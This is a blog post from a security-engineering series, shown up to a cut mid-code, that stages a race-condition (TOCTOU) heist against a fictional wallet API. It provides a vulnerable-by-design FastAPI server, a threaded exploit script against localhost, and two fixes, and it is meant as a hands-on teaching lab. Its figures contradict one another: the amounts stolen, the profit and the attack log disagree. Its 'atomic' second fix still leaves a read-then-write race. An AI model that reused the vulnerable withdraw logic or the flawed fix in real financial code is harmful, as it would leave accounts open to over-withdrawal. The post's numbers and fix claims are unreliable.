Forem: Hafiz Shamnad The latest articles on Forem by Hafiz Shamnad (@hafiz_shamnad). https://forem.com/hafiz_shamnad https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3737937%2F81d316b9-99e0-4890-b39e-4c02f666615e.png Forem: Hafiz Shamnad https://forem.com/hafiz_shamnad en Day 21 — The Heist in Milliseconds — Cracking NovaPay with a Race Condition TOCTOU Attack Hafiz Shamnad Mon, 09 Mar 2026 05:19:38 +0000 https://forem.com/hafiz_shamnad/day-21-the-heist-in-milliseconds-cracking-novapay-with-a-race-condition-toctou-attack-2i0j https://forem.com/hafiz_shamnad/day-21-the-heist-in-milliseconds-cracking-novapay-with-a-race-condition-toctou-attack-2i0j <p><em>March 9, 2026 — Day 21 of 30 Days of Security Engineering</em></p> <p>Picture this: It's a rainy Tuesday afternoon in a nondescript fintech startup's office in San Francisco. The team at NovaPay — a shiny new digital wallet app — is celebrating their latest milestone: 10,000 users onboarded, with seamless withdrawals powering the growth. Their API is "bulletproof," they say. But unbeknownst to them, a subtle flaw lurks in the shadows: a <strong>race condition vulnerability</strong>, specifically a <strong>Time-of-Check to Time-of-Use (TOCTOU)</strong> bug in the withdrawal endpoint. It's not a flashy SQL injection or XSS; it's a silent assassin that exploits concurrency, turning a 2-second delay into a crowbar for digital theft.</p> <p>In this case study, we'll dive into the breach like a red team op. I'll walk you through the vulnerability discovery, the architecture of our mini-lab (a self-contained "bank" you can spin up), the exploit mechanics, and the fixes that turn this house of cards back into Fort Knox. By the end, you'll have hands-on code, a live demo frontend, and the tools to hunt these bugs in your own systems. Think of it as a tiny CTF challenge wrapped in a heist story — because security isn't just code; it's narrative.</p> <h2> The Setup: NovaPay's House of Cards </h2> <p>NovaPay's core flow is simple: Users hit <code>/withdraw?amount=300</code> to pull funds from their wallet. The server peeks at the balance (say, $1,000), nods approvingly, then — crucially — pauses for 2 seconds to simulate real-world friction like database commits or fraud scans. Only then does it deduct the cash.</p> <p>Sounds airtight? In a single-threaded world, maybe. But users don't withdraw in isolation. What if <em>five</em> requests flood in at once? All five "peek" the $1,000 balance and pass the check <em>before</em> any deduction hits. Boom: $1,500 vanishes from a $1,000 account. The bank's ledger? A chaotic -$500.</p> <p>This is TOCTOU in action: The <strong>Time of Check</strong> (balance &gt;= amount?) happens, but by the <strong>Time of Use</strong> (deduct!), the state has shifted. No locks, no atomicity — just a shared dictionary begging for concurrency chaos.</p> <p><strong>Severity</strong>: Critical (CWE-362: Concurrent Execution Using Shared Resource with Improper Synchronization). In the wild, this has drained accounts (think double-spending in crypto) and earned bug bounties from $5K to $30K.</p> <h2> Lab Architecture: Your Personal Bank Heist Simulator </h2> <p>We've containerized this as a full-stack lab: A FastAPI backend (vulnerable by design) + a sleek React-like HTML frontend for "legit" banking and exploit controls. Spin it up locally, play the user, then flip to attacker mode.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>race_condition_lab/ │ ├── server_vulnerable.py # The flawed NovaPay API ├── index.html # Interactive banking UI + exploit panel ├── exploit.py # Python script for scripted attacks (bonus) ├── server_fixed_lock.py # Fix #1: Threading locks ├── server_fixed_atomic.py # Fix #2: Atomic subtraction ├── requirements.txt # FastAPI, Uvicorn, Requests └── README.md # Quickstart </code></pre> </div> <h3> Quickstart: Boot the Bank </h3> <ol> <li> <strong>Clone &amp; Install</strong>: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> mkdir race_condition_lab &amp;&amp; cd race_condition_lab pip install fastapi uvicorn requests </code></pre> </div> <p><code>requirements.txt</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> fastapi uvicorn requests </code></pre> </div> <ol> <li> <strong>Fire Up the Server</strong>: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> uvicorn server_vulnerable:app --reload --port 8000 </code></pre> </div> <p>API live at <code>http://127.0.0.1:8000</code>. CORS enabled for the frontend.</p> <ol> <li><p><strong>Launch the UI</strong>:<br> Open <code>index.html</code> in your browser (serves from <code>file://</code> or host via <code>python -m http.server 8080</code>). It auto-fetches balance and transactions.</p></li> <li> <p><strong>Test Legit</strong>:</p> <ul> <li>Hit <code>/balance</code>: <code>{"balance": 1000, "owner": "Alex Johnson", "account": "****4291", "transactions": []}</code> </li> <li>Withdraw $300 via UI: Success, balance drops to $700.</li> </ul> </li> </ol> <p>Now, the fun begins.</p> <h2> The Flaw Exposed: Vulnerable Server Code </h2> <p>Here's the heart of the breach — <code>server_vulnerable.py</code>. Notice the fatal gap: Check, sleep, deduct. No synchronization.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="n">fastapi</span> <span class="kn">import</span> <span class="n">FastAPI</span> <span class="kn">from</span> <span class="n">fastapi.middleware.cors</span> <span class="kn">import</span> <span class="n">CORSMiddleware</span> <span class="kn">import</span> <span class="n">time</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">FastAPI</span><span class="p">()</span> <span class="n">app</span><span class="p">.</span><span class="nf">add_middleware</span><span class="p">(</span> <span class="n">CORSMiddleware</span><span class="p">,</span> <span class="n">allow_origins</span><span class="o">=</span><span class="p">[</span><span class="sh">"</span><span class="s">*</span><span class="sh">"</span><span class="p">],</span> <span class="n">allow_methods</span><span class="o">=</span><span class="p">[</span><span class="sh">"</span><span class="s">*</span><span class="sh">"</span><span class="p">],</span> <span class="n">allow_headers</span><span class="o">=</span><span class="p">[</span><span class="sh">"</span><span class="s">*</span><span class="sh">"</span><span class="p">],</span> <span class="p">)</span> <span class="c1"># Simulated database — shared state, no locks </span><span class="n">wallet</span> <span class="o">=</span> <span class="p">{</span> <span class="sh">"</span><span class="s">balance</span><span class="sh">"</span><span class="p">:</span> <span class="mi">1000</span><span class="p">,</span> <span class="sh">"</span><span class="s">owner</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">Alex Johnson</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">account</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">****4291</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">transactions</span><span class="sh">"</span><span class="p">:</span> <span class="p">[]</span> <span class="p">}</span> <span class="nd">@app.get</span><span class="p">(</span><span class="sh">"</span><span class="s">/</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">home</span><span class="p">():</span> <span class="k">return</span> <span class="p">{</span><span class="sh">"</span><span class="s">message</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">NovaPay Banking API</span><span class="sh">"</span><span class="p">}</span> <span class="nd">@app.get</span><span class="p">(</span><span class="sh">"</span><span class="s">/balance</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">balance</span><span class="p">():</span> <span class="k">return</span> <span class="p">{</span> <span class="sh">"</span><span class="s">balance</span><span class="sh">"</span><span class="p">:</span> <span class="n">wallet</span><span class="p">[</span><span class="sh">"</span><span class="s">balance</span><span class="sh">"</span><span class="p">],</span> <span class="sh">"</span><span class="s">owner</span><span class="sh">"</span><span class="p">:</span> <span class="n">wallet</span><span class="p">[</span><span class="sh">"</span><span class="s">owner</span><span class="sh">"</span><span class="p">],</span> <span class="sh">"</span><span class="s">account</span><span class="sh">"</span><span class="p">:</span> <span class="n">wallet</span><span class="p">[</span><span class="sh">"</span><span class="s">account</span><span class="sh">"</span><span class="p">],</span> <span class="sh">"</span><span class="s">transactions</span><span class="sh">"</span><span class="p">:</span> <span class="n">wallet</span><span class="p">[</span><span class="sh">"</span><span class="s">transactions</span><span class="sh">"</span><span class="p">][</span><span class="o">-</span><span class="mi">10</span><span class="p">:]</span> <span class="p">}</span> <span class="nd">@app.post</span><span class="p">(</span><span class="sh">"</span><span class="s">/withdraw</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">withdraw</span><span class="p">(</span><span class="n">amount</span><span class="p">:</span> <span class="nb">int</span><span class="p">):</span> <span class="c1"># ⚠️ VULNERABILITY: Check-then-act race condition </span> <span class="c1"># The balance check and deduction are NOT atomic </span> <span class="k">if</span> <span class="n">wallet</span><span class="p">[</span><span class="sh">"</span><span class="s">balance</span><span class="sh">"</span><span class="p">]</span> <span class="o">&gt;=</span> <span class="n">amount</span><span class="p">:</span> <span class="c1"># Simulate real-world processing delay (DB call, fraud check, etc.) </span> <span class="n">time</span><span class="p">.</span><span class="nf">sleep</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span> <span class="c1"># By the time we get here, another request may have already </span> <span class="c1"># deducted the balance — but we already passed the check above! </span> <span class="n">wallet</span><span class="p">[</span><span class="sh">"</span><span class="s">balance</span><span class="sh">"</span><span class="p">]</span> <span class="o">-=</span> <span class="n">amount</span> <span class="n">tx</span> <span class="o">=</span> <span class="p">{</span> <span class="sh">"</span><span class="s">id</span><span class="sh">"</span><span class="p">:</span> <span class="nf">len</span><span class="p">(</span><span class="n">wallet</span><span class="p">[</span><span class="sh">"</span><span class="s">transactions</span><span class="sh">"</span><span class="p">])</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="sh">"</span><span class="s">type</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">debit</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">amount</span><span class="sh">"</span><span class="p">:</span> <span class="n">amount</span><span class="p">,</span> <span class="sh">"</span><span class="s">status</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">success</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">timestamp</span><span class="sh">"</span><span class="p">:</span> <span class="n">time</span><span class="p">.</span><span class="nf">strftime</span><span class="p">(</span><span class="sh">"</span><span class="s">%H:%M:%S</span><span class="sh">"</span><span class="p">)</span> <span class="p">}</span> <span class="n">wallet</span><span class="p">[</span><span class="sh">"</span><span class="s">transactions</span><span class="sh">"</span><span class="p">].</span><span class="nf">append</span><span class="p">(</span><span class="n">tx</span><span class="p">)</span> <span class="k">return</span> <span class="p">{</span> <span class="sh">"</span><span class="s">status</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">success</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">withdrawn</span><span class="sh">"</span><span class="p">:</span> <span class="n">amount</span><span class="p">,</span> <span class="sh">"</span><span class="s">new_balance</span><span class="sh">"</span><span class="p">:</span> <span class="n">wallet</span><span class="p">[</span><span class="sh">"</span><span class="s">balance</span><span class="sh">"</span><span class="p">],</span> <span class="sh">"</span><span class="s">transaction_id</span><span class="sh">"</span><span class="p">:</span> <span class="n">tx</span><span class="p">[</span><span class="sh">"</span><span class="s">id</span><span class="sh">"</span><span class="p">]</span> <span class="p">}</span> <span class="k">return</span> <span class="p">{</span> <span class="sh">"</span><span class="s">status</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">failed</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">message</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">Insufficient funds</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">balance</span><span class="sh">"</span><span class="p">:</span> <span class="n">wallet</span><span class="p">[</span><span class="sh">"</span><span class="s">balance</span><span class="sh">"</span><span class="p">]</span> <span class="p">}</span> <span class="nd">@app.post</span><span class="p">(</span><span class="sh">"</span><span class="s">/deposit</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">deposit</span><span class="p">(</span><span class="n">amount</span><span class="p">:</span> <span class="nb">int</span><span class="p">):</span> <span class="n">wallet</span><span class="p">[</span><span class="sh">"</span><span class="s">balance</span><span class="sh">"</span><span class="p">]</span> <span class="o">+=</span> <span class="n">amount</span> <span class="n">tx</span> <span class="o">=</span> <span class="p">{</span> <span class="sh">"</span><span class="s">id</span><span class="sh">"</span><span class="p">:</span> <span class="nf">len</span><span class="p">(</span><span class="n">wallet</span><span class="p">[</span><span class="sh">"</span><span class="s">transactions</span><span class="sh">"</span><span class="p">])</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="sh">"</span><span class="s">type</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">credit</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">amount</span><span class="sh">"</span><span class="p">:</span> <span class="n">amount</span><span class="p">,</span> <span class="sh">"</span><span class="s">status</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">success</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">timestamp</span><span class="sh">"</span><span class="p">:</span> <span class="n">time</span><span class="p">.</span><span class="nf">strftime</span><span class="p">(</span><span class="sh">"</span><span class="s">%H:%M:%S</span><span class="sh">"</span><span class="p">)</span> <span class="p">}</span> <span class="n">wallet</span><span class="p">[</span><span class="sh">"</span><span class="s">transactions</span><span class="sh">"</span><span class="p">].</span><span class="nf">append</span><span class="p">(</span><span class="n">tx</span><span class="p">)</span> <span class="k">return</span> <span class="p">{</span><span class="sh">"</span><span class="s">status</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">success</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">new_balance</span><span class="sh">"</span><span class="p">:</span> <span class="n">wallet</span><span class="p">[</span><span class="sh">"</span><span class="s">balance</span><span class="sh">"</span><span class="p">]}</span> <span class="nd">@app.post</span><span class="p">(</span><span class="sh">"</span><span class="s">/reset</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">reset</span><span class="p">():</span> <span class="n">wallet</span><span class="p">[</span><span class="sh">"</span><span class="s">balance</span><span class="sh">"</span><span class="p">]</span> <span class="o">=</span> <span class="mi">1000</span> <span class="n">wallet</span><span class="p">[</span><span class="sh">"</span><span class="s">transactions</span><span class="sh">"</span><span class="p">]</span> <span class="o">=</span> <span class="p">[]</span> <span class="k">return</span> <span class="p">{</span><span class="sh">"</span><span class="s">status</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">reset</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">balance</span><span class="sh">"</span><span class="p">:</span> <span class="mi">1000</span><span class="p">}</span> </code></pre> </div> <p>The frontend (<code>index.html</code>) is a polished banking dashboard: Balance hero, withdraw/deposit forms, transaction history. But scroll down — there's an "Exploit Panel" for the attack, complete with concurrent request launcher, live logs, and theft stats. (Full HTML code below; it's ~500 lines of CSS/JS magic for that pro feel.)</p> <h2> The Heist: Exploiting the Race Window </h2> <p>As the attacker (let's call you "ShadowWire," a curious pentester), you recon the API with Burp or curl. Balance check? Clean. Single withdraw? Fine. But load testing reveals the crack.</p> <h3> Attack Timeline: The Crowbar in Action </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>t=0s: 5 threads hit /withdraw?amount=300 All read balance=1000 → All pass "if &gt;=300" t=2s: Delays end sequentially Thread1: 1000-300=700 ✓ Thread2: 700-300=400 ✓ Thread3: 400-300=100 ✓ Thread4: 100-300=-200 ✓ (no check!) Thread5: -200-300=-500 ✗ (but 4 already succeeded) Net: $1,200 stolen from $1,000. Bank? -$500. ShadowWire walks with $900 profit. </code></pre> </div> <h3> Hands-On Exploit #1: UI Attack Panel </h3> <p>In the frontend's "Race Condition Lab" panel:</p> <ul> <li>Set amount=$300, threads=4.</li> <li>Hit "🚀 Launch Attack".</li> <li>Watch the log: </li> </ul> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> [*] Target balance: $1,000 [*] Firing 4 simultaneous requests for $300 each... [✓] Request 1: SUCCESS — withdrew $300, balance now $700 [✓] Request 2: SUCCESS — withdrew $300, balance now $400 [✗] Request 3: FAILED — Insufficient funds [+] VULNERABILITY CONFIRMED: Over-withdrew by $300! </code></pre> </div> <p>Balance refreshes to $400 (wait, what?). You just "stole" $300 extra. Reset via <code>/reset</code> and retry with more threads for bigger hauls.</p> <p>The JS uses <code>Promise.all</code> for concurrency — pure browser-based TOCTOU.</p> <h3> Hands-On Exploit #2: Scripted Fury (<code>exploit.py</code>) </h3> <p>For automation (or chaining in a Burp Turbo Intruder setup):<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">import</span> <span class="n">threading</span> <span class="kn">import</span> <span class="n">requests</span> <span class="kn">import</span> <span class="n">time</span> <span class="n">TARGET</span> <span class="o">=</span> <span class="sh">"</span><span class="s">http://127.0.0.1:8000/withdraw</span><span class="sh">"</span> <span class="n">THREADS</span> <span class="o">=</span> <span class="mi">5</span> <span class="n">AMOUNT</span> <span class="o">=</span> <span class="mi">300</span> <span class="n">results</span> <span class="o">=</span> <span class="p">[]</span> <span class="k">def</span> <span class="nf">attack</span><span class="p">(</span><span class="n">thread_id</span><span class="p">):</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Thread </span><span class="si">{</span><span class="n">thread_id</span><span class="si">}</span><span class="s"> sending request</span><span class="sh">"</span><span class="p">)</span> <span class="n">r</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="nf">post</span><span class="p">(</span><span class="n">TARGET</span><span class="p">,</span> <span class="n">params</span><span class="o">=</span><span class="p">{</span><span class="sh">"</span><span class="s">amount</span><span class="sh">"</span><span class="p">:</span> <span class="n">AMOUNT</span><span class="p">})</span> <span class="n">results</span><span class="p">.</span><span class="nf">append</span><span class="p">(</span><span class="n">r</span><span class="p">.</span><span class="nf">json</span><span class="p">())</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Thread </span><span class="si">{</span><span class="n">thread_id</span><span class="si">}</span><span class="s"> response: </span><span class="si">{</span><span class="n">r</span><span class="p">.</span><span class="nf">json</span><span class="p">()</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">main</span><span class="p">():</span> <span class="n">threads</span> <span class="o">=</span> <span class="p">[]</span> <span class="n">start</span> <span class="o">=</span> <span class="n">time</span><span class="p">.</span><span class="nf">time</span><span class="p">()</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nf">range</span><span class="p">(</span><span class="n">THREADS</span><span class="p">):</span> <span class="n">t</span> <span class="o">=</span> <span class="n">threading</span><span class="p">.</span><span class="nc">Thread</span><span class="p">(</span><span class="n">target</span><span class="o">=</span><span class="n">attack</span><span class="p">,</span> <span class="n">args</span><span class="o">=</span><span class="p">(</span><span class="n">i</span><span class="p">,))</span> <span class="n">threads</span><span class="p">.</span><span class="nf">append</span><span class="p">(</span><span class="n">t</span><span class="p">)</span> <span class="n">t</span><span class="p">.</span><span class="nf">start</span><span class="p">()</span> <span class="k">for</span> <span class="n">t</span> <span class="ow">in</span> <span class="n">threads</span><span class="p">:</span> <span class="n">t</span><span class="p">.</span><span class="nf">join</span><span class="p">()</span> <span class="n">end</span> <span class="o">=</span> <span class="n">time</span><span class="p">.</span><span class="nf">time</span><span class="p">()</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="se">\n</span><span class="s">Attack completed in </span><span class="si">{</span><span class="nf">round</span><span class="p">(</span><span class="n">end</span><span class="o">-</span><span class="n">start</span><span class="p">,</span><span class="mi">2</span><span class="p">)</span><span class="si">}</span><span class="s"> seconds</span><span class="sh">"</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="se">\n</span><span class="s">Results:</span><span class="sh">"</span><span class="p">)</span> <span class="k">for</span> <span class="n">r</span> <span class="ow">in</span> <span class="n">results</span><span class="p">:</span> <span class="nf">print</span><span class="p">(</span><span class="n">r</span><span class="p">)</span> <span class="c1"># Fetch final balance </span> <span class="n">bal_r</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">http://127.0.0.1:8000/balance</span><span class="sh">"</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Final balance: </span><span class="si">{</span><span class="n">bal_r</span><span class="p">.</span><span class="nf">json</span><span class="p">()[</span><span class="sh">'</span><span class="s">balance</span><span class="sh">'</span><span class="p">]</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="sh">"</span><span class="s">__main__</span><span class="sh">"</span><span class="p">:</span> <span class="nf">main</span><span class="p">()</span> </code></pre> </div> <p>Run: <code>python exploit.py</code>. Output? Five "successes," balance in the red. Scale THREADS to 10 for mayhem.</p> <h2> The Autopsy: Why the Vault Cracked </h2> <p>Non-atomic ops on shared state. The <code>if</code> check reads a snapshot; the deduct writes to a mutated version. In production? Same with non-transactional DBs. Real hits: Ether's DAO hack (millions lost to races), Ticketmaster oversells, eBay coupon clones.</p> <p>Detection? Fuzz with:</p> <ul> <li> <strong>Burp Intruder/Turbo</strong>: Cluster bomb on threads.</li> <li> <strong>Scripts</strong>: Threading/asyncio for Python/Go.</li> <li> <strong>Load Tools</strong>: <code>wrk -t10 -c100</code>, <code>k6</code> scripts.</li> </ul> <h2> The Counter-Heist: Fortifying NovaPay </h2> <h3> Fix #1: Lock It Down (<code>server_fixed_lock.py</code>) </h3> <p>Wrap the critical section in a <code>threading.Lock()</code>. Only one withdraw at a time — serializes the race.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="n">fastapi</span> <span class="kn">import</span> <span class="n">FastAPI</span> <span class="kn">from</span> <span class="n">fastapi.middleware.cors</span> <span class="kn">import</span> <span class="n">CORSMiddleware</span> <span class="kn">import</span> <span class="n">threading</span> <span class="kn">import</span> <span class="n">time</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">FastAPI</span><span class="p">()</span> <span class="n">app</span><span class="p">.</span><span class="nf">add_middleware</span><span class="p">(</span><span class="n">CORSMiddleware</span><span class="p">,</span> <span class="n">allow_origins</span><span class="o">=</span><span class="p">[</span><span class="sh">"</span><span class="s">*</span><span class="sh">"</span><span class="p">],</span> <span class="n">allow_methods</span><span class="o">=</span><span class="p">[</span><span class="sh">"</span><span class="s">*</span><span class="sh">"</span><span class="p">],</span> <span class="n">allow_headers</span><span class="o">=</span><span class="p">[</span><span class="sh">"</span><span class="s">*</span><span class="sh">"</span><span class="p">])</span> <span class="n">wallet</span> <span class="o">=</span> <span class="p">{</span><span class="sh">"</span><span class="s">balance</span><span class="sh">"</span><span class="p">:</span> <span class="mi">1000</span><span class="p">,</span> <span class="sh">"</span><span class="s">owner</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">Alex Johnson</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">account</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">****4291</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">transactions</span><span class="sh">"</span><span class="p">:</span> <span class="p">[]}</span> <span class="n">lock</span> <span class="o">=</span> <span class="n">threading</span><span class="p">.</span><span class="nc">Lock</span><span class="p">()</span> <span class="c1"># ... (home, balance, deposit, reset unchanged) </span> <span class="nd">@app.post</span><span class="p">(</span><span class="sh">"</span><span class="s">/withdraw</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">withdraw</span><span class="p">(</span><span class="n">amount</span><span class="p">:</span> <span class="nb">int</span><span class="p">):</span> <span class="k">with</span> <span class="n">lock</span><span class="p">:</span> <span class="c1"># Atomic block </span> <span class="k">if</span> <span class="n">wallet</span><span class="p">[</span><span class="sh">"</span><span class="s">balance</span><span class="sh">"</span><span class="p">]</span> <span class="o">&gt;=</span> <span class="n">amount</span><span class="p">:</span> <span class="n">time</span><span class="p">.</span><span class="nf">sleep</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span> <span class="c1"># Delay still happens, but serialized </span> <span class="n">wallet</span><span class="p">[</span><span class="sh">"</span><span class="s">balance</span><span class="sh">"</span><span class="p">]</span> <span class="o">-=</span> <span class="n">amount</span> <span class="n">tx</span> <span class="o">=</span> <span class="p">{</span><span class="sh">"</span><span class="s">id</span><span class="sh">"</span><span class="p">:</span> <span class="nf">len</span><span class="p">(</span><span class="n">wallet</span><span class="p">[</span><span class="sh">"</span><span class="s">transactions</span><span class="sh">"</span><span class="p">])</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="sh">"</span><span class="s">type</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">debit</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">amount</span><span class="sh">"</span><span class="p">:</span> <span class="n">amount</span><span class="p">,</span> <span class="sh">"</span><span class="s">status</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">success</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">timestamp</span><span class="sh">"</span><span class="p">:</span> <span class="n">time</span><span class="p">.</span><span class="nf">strftime</span><span class="p">(</span><span class="sh">"</span><span class="s">%H:%M:%S</span><span class="sh">"</span><span class="p">)}</span> <span class="n">wallet</span><span class="p">[</span><span class="sh">"</span><span class="s">transactions</span><span class="sh">"</span><span class="p">].</span><span class="nf">append</span><span class="p">(</span><span class="n">tx</span><span class="p">)</span> <span class="k">return</span> <span class="p">{</span><span class="sh">"</span><span class="s">status</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">success</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">withdrawn</span><span class="sh">"</span><span class="p">:</span> <span class="n">amount</span><span class="p">,</span> <span class="sh">"</span><span class="s">new_balance</span><span class="sh">"</span><span class="p">:</span> <span class="n">wallet</span><span class="p">[</span><span class="sh">"</span><span class="s">balance</span><span class="sh">"</span><span class="p">],</span> <span class="sh">"</span><span class="s">transaction_id</span><span class="sh">"</span><span class="p">:</span> <span class="n">tx</span><span class="p">[</span><span class="sh">"</span><span class="s">id</span><span class="sh">"</span><span class="p">]}</span> <span class="k">return</span> <span class="p">{</span><span class="sh">"</span><span class="s">status</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">failed</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">message</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">Insufficient funds</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">balance</span><span class="sh">"</span><span class="p">:</span> <span class="n">wallet</span><span class="p">[</span><span class="sh">"</span><span class="s">balance</span><span class="sh">"</span><span class="p">]}</span> </code></pre> </div> <p>Tradeoff: Throughput drops under load. Fine for low-traffic, but scale with Redis locks.</p> <h3> Fix #2: Atomic Math (<code>server_fixed_atomic.py</code>) </h3> <p>Ditch the check-delay-deduct. Compute <em>new</em> balance first, reject if negative. No window.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="n">fastapi</span> <span class="kn">import</span> <span class="n">FastAPI</span> <span class="kn">from</span> <span class="n">fastapi.middleware.cors</span> <span class="kn">import</span> <span class="n">CORSMiddleware</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">FastAPI</span><span class="p">()</span> <span class="n">app</span><span class="p">.</span><span class="nf">add_middleware</span><span class="p">(</span><span class="n">CORSMiddleware</span><span class="p">,</span> <span class="n">allow_origins</span><span class="o">=</span><span class="p">[</span><span class="sh">"</span><span class="s">*</span><span class="sh">"</span><span class="p">],</span> <span class="n">allow_methods</span><span class="o">=</span><span class="p">[</span><span class="sh">"</span><span class="s">*</span><span class="sh">"</span><span class="p">],</span> <span class="n">allow_headers</span><span class="o">=</span><span class="p">[</span><span class="sh">"</span><span class="s">*</span><span class="sh">"</span><span class="p">])</span> <span class="n">wallet</span> <span class="o">=</span> <span class="p">{</span><span class="sh">"</span><span class="s">balance</span><span class="sh">"</span><span class="p">:</span> <span class="mi">1000</span><span class="p">,</span> <span class="sh">"</span><span class="s">owner</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">Alex Johnson</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">account</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">****4291</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">transactions</span><span class="sh">"</span><span class="p">:</span> <span class="p">[]}</span> <span class="c1"># ... (home, balance, deposit, reset unchanged) </span> <span class="nd">@app.post</span><span class="p">(</span><span class="sh">"</span><span class="s">/withdraw</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">withdraw</span><span class="p">(</span><span class="n">amount</span><span class="p">:</span> <span class="nb">int</span><span class="p">):</span> <span class="n">new_balance</span> <span class="o">=</span> <span class="n">wallet</span><span class="p">[</span><span class="sh">"</span><span class="s">balance</span><span class="sh">"</span><span class="p">]</span> <span class="o">-</span> <span class="n">amount</span> <span class="k">if</span> <span class="n">new_balance</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">:</span> <span class="k">return</span> <span class="p">{</span><span class="sh">"</span><span class="s">status</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">failed</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">message</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">Insufficient funds</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">balance</span><span class="sh">"</span><span class="p">:</span> <span class="n">wallet</span><span class="p">[</span><span class="sh">"</span><span class="s">balance</span><span class="sh">"</span><span class="p">]}</span> <span class="n">wallet</span><span 